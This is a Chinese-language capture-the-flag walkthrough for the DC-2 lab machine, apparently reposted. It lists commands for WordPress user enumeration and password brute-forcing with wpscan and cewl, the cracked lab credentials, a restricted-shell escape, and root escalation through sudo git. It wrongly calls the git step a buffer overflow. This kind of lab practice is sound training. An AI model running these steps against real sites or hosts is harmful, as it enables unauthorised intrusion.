标签:bin Username http DC dc PATH 靶机 txt
仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-2.zip
一、主机扫描
二、信息收集
修改hosts文件
windows:C:\Windows\System32\drivers\etc
linux:/etc/hosts
wpscan --url http://dc-2 --enumerate u
提示cewl 爬密码
cewl http://dc-2 > 1.txt
破解密码
wpscan --url http://dc-2 -U 2.txt -P 1.txt
登录账户信息收集
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
尝试ssh登录 tom parturient 7744
查看当前环境
echo $PATH
有问题找百度
添加环境变量
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/ #添加$PATH,cat和su都在/bin下
export PATH=$PATH:/usr/bin #sudo在/usr/bin下
cat flag3.txt
Username: jerry, Password: adipiscing
切换账户进行信息收集
sudo -l 查看权限
有git权限,git有一个缓冲区溢出漏洞,在使用sudo git -p --help时,不需要输入root密码即可以root权限执行这条命令
在末行命令模式输入 !/bin/bash 或 !'sh' 完成提权
!/bin/bash
标签:bin,Username,http,DC,dc,PATH,靶机,txt 来源: https://www.cnblogs.com/bingtang123/p/12838405.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。